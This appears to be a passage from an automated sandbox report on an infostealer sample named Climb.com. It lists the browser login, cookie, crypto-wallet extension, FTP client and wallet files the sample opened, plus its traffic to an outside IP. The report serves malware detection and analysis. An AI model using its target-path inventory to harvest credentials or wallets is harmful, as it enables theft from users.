Source: Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Climb.com, 0000000E.00000002.3576614656.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Climb.com, 0000000E.00000002.3577081921.0000000003D00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: Climb.com, 0000000E.00000002.3577081921.0000000003D00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: keystore

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.12:49714 -> 194.87.58.92:80

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: Climb.com	Binary or memory string: WIN_81
Source: Climb.com	Binary or memory string: WIN_XP
Source: Alt.11.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Climb.com	Binary or memory string: WIN_XPe
Source: Climb.com	Binary or memory string: WIN_VISTA
Source: Climb.com	Binary or memory string: WIN_7
Source: Climb.com	Binary or memory string: WIN_8

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
